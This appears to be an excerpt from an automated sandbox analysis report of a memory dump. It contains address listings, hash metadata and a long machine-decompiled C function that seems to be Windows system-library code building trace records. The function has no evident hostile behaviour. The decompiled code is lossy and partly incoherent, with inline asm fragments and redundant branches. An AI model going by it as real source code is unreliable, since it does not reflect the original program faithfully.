                                                                                                    0x00a8faf3
                                                                                                    0x00000000
                                                                                                    0x00a8faf3
                                                                                                    0x00a8fab4
                                                                                                    0x00a8fa79
                                                                                                    0x00a8fa56
                                                                                                    0x00a8fa56
                                                                                                    0x00000000
                                                                                                    0x00a8fa56
                                                                                                    0x00a8f94d
                                                                                                    0x00a8f950
                                                                                                    0x00a8f955
                                                                                                    0x00ae5e79
                                                                                                    0x00ae5e7f
                                                                                                    0x00ae5e7f
                                                                                                    0x00ae5e79
                                                                                                    0x00a8f95b
                                                                                                    0x00a8f960
                                                                                                    0x00ae5e88
                                                                                                    0x00ae5e8a
                                                                                                    0x00ae5e8a
                                                                                                    0x00ae5e8e
                                                                                                    0x00ae5e93
                                                                                                    0x00000000
                                                                                                    0x00ae5e99
                                                                                                    0x00ae5e9c
                                                                                                    0x00ae5e9f
                                                                                                    0x00ae5ea1
                                                                                                    0x00ae5ea3
                                                                                                    0x00ae5ea3
                                                                                                    0x00ae5ea7
                                                                                                    0x00000000
                                                                                                    0x00ae5ea7
                                                                                                    0x00a8f966
                                                                                                    0x00a8f966
                                                                                                    0x00a8f96b
                                                                                                    0x00ae5eb0
                                                                                                    0x00ae5eb6
                                                                                                    0x00ae5eb6
                                                                                                    0x00ae5eb0
                                                                                                    0x00a8f973
                                                                                                    0x00a8fbc7
                                                                                                    0x00a8f9a5
                                                                                                    0x00a8f9a5
                                                                                                    0x00000000
                                                                                                    0x00a8f979
                                                                                                    0x00a8f97d
                                                                                                    0x00a8f97f
                                                                                                    0x00ae5ebf
                                                                                                    0x00ae5ec5
                                                                                                    0x00ae5ec5
                                                                                                    0x00ae5ebf
                                                                                                    0x00a8f987
                                                                                                    0x00000000
                                                                                                    0x00a8f98d
                                                                                                    0x00a8f98d
                                                                                                    0x00a8f990
                                                                                                    0x00a8f994
                                                                                                    0x00a8f997
                                                                                                    0x00a8f99f
                                                                                                    0x00a8fff7
                                                                                                    0x00a90061
                                                                                                    0x00a90064
                                                                                                    0x00a9006a
                                                                                                    0x00ae5ece
                                                                                                    0x00ae5ed0
                                                                                                    0x00ae5ed0
                                                                                                    0x00000000
                                                                                                    0x00a90064
                                                                                                    0x00a8fffd
                                                                                                    0x00a90000
                                                                                                    0x00000000
                                                                                                    0x00a90006
                                                                                                    0x00ae5ecc
                                                                                                    0x00000000
                                                                                                    0x00ae5ecc
                                                                                                    0x00a90000
                                                                                                    0x00000000
                                                                                                    0x00a8f99f
                                                                                                    0x00a8f987
                                                                                                    0x00a8f973

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: fc66cec98a30fadb5342584c4926ef08b8d30d1ee31ce6150576712f1cb138a4
                                                                                                    • Instruction ID: cb9942901ecd3009177d99a7a849022cc759e5023e6849c3567083ec82a733a3
                                                                                                    • Opcode Fuzzy Hash: fc66cec98a30fadb5342584c4926ef08b8d30d1ee31ce6150576712f1cb138a4
                                                                                                    • Instruction Fuzzy Hash: 3D62F232E046679FCF22DF29C44076AFBB1AF65364F2986B9CCA59B242D371DD418780
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00B55BA5, Relevance: .6, Instructions: 592COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 88%
                                                                                                    			E00B55BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0xb61178);
				E00ADD0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E00B54C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E00ACD000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E00B55542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0xb760e8;
								if( *0xb760e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0xb760e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E00AC9710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E00AC6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E00ACF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E00ACF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E00ACF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E00ACFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E00ACFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E00ACF3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E00ACF3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E00B54CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E00ADD130(_t427, _t494, _t511);
				}
			}










































































                                                                                                    0x00b55ba5
                                                                                                    0x00b55baa
                                                                                                    0x00b55baf
                                                                                                    0x00b55bb4
                                                                                                    0x00b55bb6
                                                                                                    0x00b55bbc
                                                                                                    0x00b55bbe
                                                                                                    0x00b55bc4
                                                                                                    0x00b55bcd
                                                                                                    0x00b55bd3
                                                                                                    0x00b55bd6
                                                                                                    0x00b55bdc
                                                                                                    0x00b55be0
                                                                                                    0x00b55be3
                                                                                                    0x00b55beb
                                                                                                    0x00b55bf2
                                                                                                    0x00b55bf8
                                                                                                    0x00b55bfe
                                                                                                    0x00b55c04
                                                                                                    0x00b55c0e
                                                                                                    0x00b55c18
                                                                                                    0x00b55c1f
                                                                                                    0x00b55c25
                                                                                                    0x00b55c2a
                                                                                                    0x00b55c2c
                                                                                                    0x00b55c32
                                                                                                    0x00b55c3a
                                                                                                    0x00b55c3f
                                                                                                    0x00b55c42
                                                                                                    0x00b55c48
                                                                                                    0x00b55c5b
                                                                                                    0x00b55c5b
                                                                                                    0x00b55c2c
                                                                                                    0x00b55cb7
                                                                                                    0x00b55cb9
                                                                                                    0x00b55cbf
                                                                                                    0x00b55cc2
                                                                                                    0x00b55cca
                                                                                                    0x00b55ccb
                                                                                                    0x00b55ccb
                                                                                                    0x00b55cd1
                                                                                                    0x00b55cd7
                                                                                                    0x00b55cda
                                                                                                    0x00b55ce1
                                                                                                    0x00b55ce4
                                                                                                    0x00b55ce7
                                                                                                    0x00b55ced
                                                                                                    0x00b55cf3
                                                                                                    0x00b55cf9
                                                                                                    0x00b55cff
                                                                                                    0x00b55d08
                                                                                                    0x00b55d0a
                                                                                                    0x00b55d0e
                                                                                                    0x00b55d10
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00b55d16
                                                                                                    0x00b55d1a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00b55d20
                                                                                                    0x00b55d22
                                                                                                    0x00b55d25
                                                                                                    0x00b55d2f
                                                                                                    0x00b55d2f
                                                                                                    0x00b55d33
                                                                                                    0x00b55d3d
                                                                                                    0x00b55d49
                                                                                                    0x00b55d4b
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00b55d5a
                                                                                                    0x00b55d5d
                                                                                                    0x00b55d60
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00b55d66
                                                                                                    0x00b55d69
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00b55d6f
                                                                                                    0x00b55d6f
                                                                                                    0x00b55d73
                                                                                                    0x00b55d79
                                                                                                    0x00b55d7f
                                                                                                    0x00b55d86
                                                                                                    0x00b55d95
                                                                                                    0x00b55d98
                                                                                                    0x00b55dba
                                                                                                    0x00b55dcb
                                                                                                    0x00b55dce
                                                                                                    0x00b55dd3
                                                                                                    0x00b55dd6
                                                                                                    0x00b55dd8
                                                                                                    0x00b55de6
                                                                                                    0x00b55dec
                                                                                                    0x00b55dee
                                                                                                    0x00b55df1
                                                                                                    0x00b55df3
                                                                                                    0x00b5635a
                                                                                                    0x00b5635a
                                                                                                    0x00000000
                                                                                                    0x00b5635a
                                                                                                    0x00b55dfe
                                                                                                    0x00b55e02
                                                                                                    0x00b55e05
                                                                                                    0x00b55e07
                                                                                                    0x00b55e10
                                                                                                    0x00b55e13
                                                                                                    0x00b55e1b
                                                                                                    0x00b55e1c
                                                                                                    0x00b55e21
                                                                                                    0x00b55e22
                                                                                                    0x00b55e23
                                                                                                    0x00b55e25
                                                                                                    0x00b55e2a
                                                                                                    0x00b55e2c
                                                                                                    0x00b55e2e
                                                                                                    0x00b55e36
                                                                                                    0x00b55e39
                                                                                                    0x00b55e42
                                                                                                    0x00b55e47
                                                                                                    0x00b55e4d
                                                                                                    0x00b55e54
                                                                                                    0x00b55e54
                                                                                                    0x00b55e54
                                                                                                    0x00b55e2e
                                                                                                    0x00b55e5c
                                                                                                    0x00b55e5f
                                                                                                    0x00b55e62
                                                                                                    0x00b55e64
                                                                                                    0x00b55e6b
                                                                                                    0x00b55e70
                                                                                                    0x00b55e7a
                                                                                                    0x00b55e7a
                                                                                                    0x00b55e7a
                                                                                                    0x00b55e6b
                                                                                                    0x00b55e7e
                                                                                                    0x00b55e7f
                                                                                                    0x00b55e7f
                                                                                                    0x00b55e81
                                                                                                    0x00b55e87
                                                                                                    0x00b55e8b
                                                                                                    0x00b55e8c
                                                                                                    0x00b55e8c
                                                                                                    0x00b55e8c
                                                                                                    0x00b55e9a
                                                                                                    0x00b55e9c
                                                                                                    0x00b55ea2
                                                                                                    0x00b55ea6
                                                                                                    0x00b55f50
                                                                                                    0x00b55f50
                                                                                                    0x00b55f57
                                                                                                    0x00b55f66
                                                                                                    0x00b55f66
                                                                                                    0x00b55f66
                                                                                                    0x00b55f68
                                                                                                    0x00b55f6a
                                                                                                    0x00b563d0
                                                                                                    0x00000000
                                                                                                    0x00b55f70
                                                                                                    0x00b55f70
                                                                                                    0x00b55f91
                                                                                                    0x00b55f9c
                                                                                                    0x00b55f9e
                                                                                                    0x00b55fa4
                                                                                                    0x00b55fa6
                                                                                                    0x00b5638c
                                                                                                    0x00b56392
                                                                                                    0x00b563a1
                                                                                                    0x00b563a7
                                                                                                    0x00b563af
                                                                                                    0x00b563af
                                                                                                    0x00b563bd
                                                                                                    0x00b563d8
                                                                                                    0x00000000
                                                                                                    0x00b563d8
                                                                                                    0x00b55fac
                                                                                                    0x00b55fb2
                                                                                                    0x00b55fb4
                                                                                                    0x00b55fbd
                                                                                                    0x00b55fc6
                                                                                                    0x00b55fce
                                                                                                    0x00b55fd4
                                                                                                    0x00b55fdc
                                                                                                    0x00b55fec
                                                                                                    0x00b55fed
                                                                                                    0x00b55fee
                                                                                                    0x00b55fef
                                                                                                    0x00b55ff9
                                                                                                    0x00b55ffa
                                                                                                    0x00b55ffb
                                                                                                    0x00b55ffc
                                                                                                    0x00b56000
                                                                                                    0x00b56004
                                                                                                    0x00b56012
                                                                                                    0x00b56012
                                                                                                    0x00b56018
                                                                                                    0x00b56019
                                                                                                    0x00b5601a
                                                                                                    0x00b5601b
                                                                                                    0x00b5601c
                                                                                                    0x00b56020
                                                                                                    0x00b56059
                                                                                                    0x00b5605c
                                                                                                    0x00b56061
                                                                                                    0x00b56061
                                                                                                    0x00b56022
                                                                                                    0x00b56022
                                                                                                    0x00b56022
                                                                                                    0x00b56025
                                                                                                    0x00b5602a
                                                                                                    0x00b5602b
                                                                                                    0x00b56031
                                                                                                    0x00b56037
